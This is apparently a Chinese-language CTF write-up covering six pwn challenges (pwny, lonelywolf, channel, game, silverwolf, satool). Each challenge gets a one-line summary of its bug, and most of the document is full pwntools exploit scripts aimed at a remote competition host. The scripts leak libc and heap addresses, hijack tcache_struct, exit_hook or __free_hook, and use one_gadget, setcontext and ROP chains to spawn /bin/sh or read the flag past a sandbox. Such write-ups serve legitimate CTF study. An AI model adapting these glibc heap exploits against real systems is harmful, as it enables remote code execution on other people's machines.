pwnf
数组越界,负数泄露libc,任意地址写劫持exit_hook为one_gadget从而getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'
binary = 'pwny'
elf = ELF('pwny')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-","-L","","-g","1234",binary])
#p = process(["qemu-","-L","",binary])
else:
host = "124.70.13.20"
port = 20798
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd1(a):
p.sendlineafter('choice: ','1')
p.sendlineafter('Index: ',a)
def cmd2(a,b):
p.sendlineafter('choice: ','2')
p.sendlineafter('Index: ',str(a))
p.sendline(b)
sla(': ','2')
sla('Index: ',str(0x100))
sla(': ','2')
sla('Index: ',str(0x100))
cmd1(p64((-8)&0xffffffffffffffff))
ru('Result: ')
libc_base = int(p.recv(12),16) - libc.sym['_IO_2_1_stdout_']
lg("libc_base",libc_base)
#__rtld_global+3848
addr = libc_base + 0x61b060 + 3848
one = [0x4f3d5,0x4f432,0xe5617,0xe561e]
og = libc_base + one[1]
cmd1(p64((-11)&0xffffffffffffffff))
ru('Result: ')
codebase_addr = int(p.recv(12),16)-0x202008+0x202060
lg("codebase_addr",codebase_addr)
cmd1(p64((-1)&0xffffffffffffffff))
off = addr - codebase_addr
lg("off",off)
cmd2(off/8,p64(og))
attach(p)
p.sendline("3")
p.interactive()
lonelywolf
uaf漏洞,劫持tcache_struct,free之后泄露libc,然后劫持free_hook为one_gadget从而getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'lonelywolf'
elf = ELF('lonelywolf')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-","-L","","-g","1234",binary])
#p = process(["qemu-","-L","",binary])
else:
host = "124.70.13.20"
port = 20757
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("choice: ",str(idx))
def add(size,idx):
cmd(1)
sla("Index: ",str(idx))
sla("Size: ",str(size))
def free(idx):
cmd(4)
sla("Index: ",str(idx))
def show(idx):
cmd(3)
sla("Index: ",str(idx))
def edit(idx,payload):
cmd(2)
sla("Index: ",str(idx))
sa("Content: ",payload)
for i in range(0x10):
add(0x78,0)
free(0)
edit(0,"a"*0x10+'\n')
free(0)
show(0)
ru("Content: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
edit(0,p64(heap_addr-0x9e0+0x10)+p64(0)+'\n')
add(0x78,0)
add(0x78,0)
# add(0x78,"0")
edit(0,"\xff"*0x78+'\n')
free(0)
show(0)
libc_base = l64()-96-libc.sym["__malloc_hook"]-0x10
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]
free_hook = libc_base+libc.sym["__free_hook"]
edit(0,'\x01'*0x20+p64(free_hook-0x10)*6+'\n')
add(0x28,0)
"""
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
edit(0,"/bin/sh;"+p64(0x10a41c+libc_base)*2+'\n')
# for in range()
# show(0)
# add(0x78,1)
# edit(0,'a')
# free(0)
# free(1)
# gdb.attach(p)
free(0)
p.interactive()
channel
远程qemu-user ,libc和heap地址固定,因此泄露出libc和heap,劫持free_hook为system,稳定获取shell
泄露地址部分
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'channel'
elf = ELF('channel')
libc = ELF("./aarch64-linux-gnu/lib/libc.so.6")
context.binary = binary
DEBUG = 0
if DEBUG:
# p = process(binary)
# p = process(["qemu-aarch64","-L","./aarch64-linux-gnu","-g","1234",binary])
p = process(["qemu-aarch64","-L","./aarch64-linux-gnu",binary])
else:
host = "124.70.13.20"
port = 20752
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("> ",str(idx))
def add(key):
cmd(1)
sa("key> \n",str(key))
def free(idx):
cmd(2)
sa("key> \n",str(idx))
def show(idx):
cmd(3)
sa("key> \n",str(idx))
def edit(key,size,payload):
cmd(4)
sa("key> \n",str(key))
sla("len> \n",str(size))
sa("content> \n",payload)
add("a"*0x10)
add("b"*0x10)
add("c"*0x10)
add("d"*0x10)
add("e"*0x10)
add("f"*0x10)
add("g"*0x10)
add("h"*0x10)
add("i"*0x10)
add("g"*0x10)
add("s"*0x10)
add("x"*0x10)
free("a"*0x10)
edit("b"*0x10,0x118,"a"*0x20)
free("c"*0x10)
free("d"*0x10)
free("e"*0x10)
free("f"*0x10)
free("g"*0x10)
free("h"*0x10)
free("i"*0x10)
free("a"*0x20)
cmd(3)
sa("key> \n",str("b"*0x10))
libc_base = u64(p.recv(3).ljust(0x8,'\x00'))
libc_base = libc_base+0x4000000000-libc.sym["__malloc_hook"]-0x7b8+0x1000
lg("libc_base",libc_base)
for i in range(0x8):
add("f"*0x20)
free("x"*0x10)
edit("s"*0x10,0x118,"m"*0x20)
free("f"*0x20)
free("m"*0x20)
show("s"*0x10)
heap_addr = u64(p.recv(3).ljust(8,'\x00'))+0x4000000000-0x2a0
lg("heap_addr",heap_addr)
# free("a"*0x10)
# edit("bbbb",0x118,"a"*0x110+p64(0)+p8(0x))
# gdb.attach(p)
p.interactive()
# 0x4000012018
#0x400086c000
getshell部分
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'channel'
elf = ELF('channel')
libc = ELF("./aarch64-linux-gnu/lib/libc.so.6")
context.binary = binary
DEBUG = 0
if DEBUG:
# p = process(binary)
p = process(["qemu-aarch64","-L","./aarch64-linux-gnu","-g","1234",binary])
# p = process(["qemu-aarch64","-L","./aarch64-linux-gnu",binary])
else:
host = "124.70.13.20"
port = 20752
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("> ",str(idx))
def add(key):
cmd(1)
sa("key> \n",str(key))
def free(idx):
cmd(2)
sa("key> \n",str(idx))
def show(idx):
cmd(3)
sa("key> \n",str(idx))
def edit(key,size,payload):
cmd(4)
sa("key> \n",str(key))
sla("len> \n",str(size))
sa("content> \n",payload)
local_heap = 0x40009e0000
local_libc = 0x400086c000
libc_addr = 0x4000848000
heap_addr = 0x40009bc000
#0x40009e06a0
add("x"*0xf0+p64(0)+p64(0x101))
add("a"*0x10)
add("b"*0x10)
add("c"*0x10)
add("d"*0x10)
add("/bin/sh\x00"*2)
free("c"*0x10)
free("a"*0x10)
free("d"*0x10)
edit("/bin/sh\x00"*2,0x118,"a"*0x100+p64(heap_addr-0x410+0x7b0))
pay = '\x00'*0x18+p64(0x121)+p64(heap_addr-0x410+0xa10)+p64(heap_addr+0x10)
free(pay.ljust(0x100,'\x00'))
edit("/bin/sh\x00"*2,0xf0,"a"*0x18+p64(0x121)+p64(libc.sym["__free_hook"]+libc_addr)+p64(0))
edit("/bin/sh\x00"*2,0x110,"aaaa")
edit("/bin/sh\x00"*2,0x110,p64(libc_addr+libc.sym["system"]))
free("/bin/sh\x00"*2)
# free("")
# pay = '\x00'*0x18+p64(0x21)+p64(0x00000040009e0c50)+'\x00'*0x10+p64(0x121)
# free(pay.ljust(0x100,"x"))
p.interactive()
#local_heap = 0x40009e0000
#local_libc = 0x400086c000
# 0x4000012018
# libc: 0x400086c000
# heap: 0x40009bc000
game
没有对边界进行检查,因此可以堆溢出,开了沙盒,因此劫持free-hook为setcontext,利用fsop来orw读出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'game'
elf = ELF('game')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-","-L","","-g","1234",binary])
#p = process(["qemu-","-L","",binary])
else:
host = "124.70.13.20"
port = 20797
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
payload = "op:"+str(idx)+'\n'
return payload
def add(size1,size2):
payload = cmd(1)+"l:"+str(size1)+'\n'+"w:"+str(size2)+'\n'+'\r\n'
return payload
def add2(idx1,size):
payload = cmd(2)+"id:"+str(idx1)+'\n'+"s:"+str(size)+'\n'+'\r\n'
return payload
def free(idx):
payload = cmd(3)+"id:"+str(idx)+'\n'+'\r\n'
return payload
def show():
payload = cmd(4)+"\r\n"
return payload
def add2p(payload):
sa("desc> ",payload)
def c5(idx):
payload = cmd(5)+'id:'+str(idx)+'\n\r\n'#-y
return payload
def c6(idx):
payload = cmd(6)+'id:'+str(idx)+'\n\r\n'#+y
return payload
def c7(idx):
payload = cmd(7)+'id:'+str(idx)+'\n\r\n'#-x
return payload
def c8(idx):
payload = cmd(8)+'id:'+str(idx)+'\n\r\n'#+x
return payload
def menup(payload):
sa("cmd> ",payload)
# menup(add(0x4,0x4))
# menup(add2(1,0x1000))
# add2p("a"*0x100)
# menup(show())
# free(1)
# menup(add2(1,0x20))
# add2p("\n")
# menup(show())
# libc_base = l64()-0x0a+0xa0-96-libc.sym["__malloc_hook"]-0x10
# lg("libc_base",libc_base)
menup(add(0x4,0x7))
menup(add2(0x91,0x100))
add2p("a"*0x100)
menup(add2(3,0x100))
add2p("a"*0x100)
menup(add2(4,0x500))
add2p("a"*0x500)
menup(add2(5,0x500))
add2p("a"*0x500)
for i in range(21):
menup(c8(0x91))
menup(free(4))
menup(add2(7,0x100))
add2p('\n')
menup(show())
libc_base = l64()-0x0a+0xa0-96-libc.sym["__malloc_hook"]-0x10-0x200
lg("libc_base",libc_base)
menup(free(7))
menup(free(3))
menup(free(0x91))
menup(add2(0x45,0x180))
add2p("a"*0x100+p64(0)+p64(0x31)+p64(0)*4+p64(0)+p64(0x111)+p64(libc_base+libc.sym["__free_hook"])+p64(0))
frame = SigreturnFrame()
free_hook = libc.symbols["__free_hook"]+libc_base
lg("free_hook",free_hook)
syscall = 0x00000000000d29d5+libc_base
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
menup(add2(0x44,0x100))
add2p(str(frame))
menup(add2(0x66,0x100))
add2p(p64(libc_base+libc.sym["setcontext"]+53))
menup(free(0x44))
pop_rdi = libc_base+0x000000000002155f
pop_rsi = libc_base+0x0000000000023e8a
pop_rdx = libc_base+0x0000000000001b96
pop_rsp = libc_base+0x0000000000003960
pop_rax = libc_base+0x0000000000043a78
payload = [
pop_rdi,
free_hook1,
pop_rsi,
0x2000,
pop_rdx,
0x7,
pop_rax,
10,
syscall,
free_hook1+0x70
]
sc = shellcraft.open("./flag")
sc += shellcraft.read("rax",free_hook1+0x200,0x100)
sc += shellcraft.write("1",free_hook1+0x200,0x100)
# gdb.attach(p,"b free")
p.sendline(flat(payload).ljust(0x70,'\x90')+asm(sc))
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(show())
# menup(c6(1))
# menup(show())
# menup(c7(1))
# menup(show())
# menup(c8(1))
# menup(show())
# p.recv()
# menup(free(1))
# p.send(free(1))
p.interactive()
#0x000055555575c030
silverwolf
uaf漏洞,开了沙盒,劫持tcache_struct,泄露libc以及栈地址,劫持栈地址进行rop,从而orw出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'silverwolf'
elf = ELF('silverwolf')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-","-L","","-g","1234",binary])
#p = process(["qemu-","-L","",binary])
else:
host = "124.70.13.20"
port = 20759
p = remote(host,port)
if DEBUG == 2:
host = ""
port = 0
user = ""
passwd = ""
p = ssh(host,port,user,passwd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla("choice: ",str(idx))
def add(size):
cmd(1)
sla("Index: ",str(0))
sla("Size: ",str(size))
def edit(payload):
cmd(2)
sla("Index: ",str(0))
sa("Content: ",payload)
def show():
cmd(3)
sla("Index: ",str(0))
def free():
cmd(4)
sla("Index: ",str(0))
add(0x18)
free()
show()
ru("Content: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))-0x1750
lg("heap_addr",heap_addr)
add(0x78)
free()
edit(p64(heap_addr+0x10)+p64(0)+'\n')
add(0x78)
add(0x78)
edit("\x07"*0x78)
free()
show()
libc_base = l64()-libc.sym["__malloc_hook"]-96-0x10
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = libc_base+libc.sym["setcontext"]
edit('\x01'*0x20+p64(free_hook)*0x8+p64(libc_base+libc.sym["environ"])+p64(libc_base+libc.sym["environ"])+p64(heap_addr+0x10))
add(0x68)
show()
ru("Content: ")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("stack_addr",stack_addr)
add(0x78)
edit('\x01'*0x20+p64(free_hook)*0x8+p64(heap_addr+0x10)+p64(libc_base+libc.sym["environ"])+p64(stack_addr-0x120))
pop_rdi = 0x00000000000215bf+libc_base
pop_rsi = 0x0000000000023eea+libc_base
pop_rdx = 0x0000000000001b96+libc_base
pop_rsp = 0x0000000000003960+libc_base
pop_rax = 0x0000000000043ae8+libc_base
syscall = 0x00000000000d2745+libc_base
push_rax = 0x000000000003e10d+libc_base
free_hook1 = free_hook & 0xfffffffffffff000
payload = p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(free_hook1)
payload += p64(pop_rdx)+p64(0x1000)+p64(pop_rax)+p64(0)+p64(syscall)+p64(pop_rsp)+p64(free_hook1)
add(0x78)
# gdb.attach(p,"b *$rebase(0x01050)")
edit(payload+'\n')
payload = [
pop_rdi,
free_hook1+0x100,
pop_rsi,
0,
pop_rdx,
0,
pop_rax,
2,
syscall,
pop_rdi,
3,
pop_rsi,
free_hook1+0x200,
pop_rdx,
0x200,
pop_rax,
0,
syscall,
pop_rdi,
1,
pop_rsi,
free_hook1+0x200,
pop_rdx,
0x100,
pop_rax,
1,
syscall
]
p.sendline(flat(payload).ljust(0x100,"a")+"/flag\x00\x00\x00")
p.interactive()
satool
该题含有堆溢出漏洞以及任意函数调用,在run函数中存在函数指针,在设置fakekey时没有检查key的大小,利用残留的libc信息和og偏移将函数指针劫持为og,再用run调用函数
#include<stdio.h>
int B4ckDo0r(char *s1){
save("aaaa","aaaa");
save("aaaa","aaaa");
save("aaaa","aaaa");
save("aaaa","aaaa");
save("\x00","aaaa");
stealkey();
fakekey(-0x2e1884);
run();
}
/*0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
*/
int run(){
return 0;
}
int save(char *s1,char *s2){
return 0;
}
int stealkey(){
return 0;
}
int fakekey(int a1){
return 0;
}
int main(){
B4ckDo0r("aaaaaaaaaaaa");
}
网友评论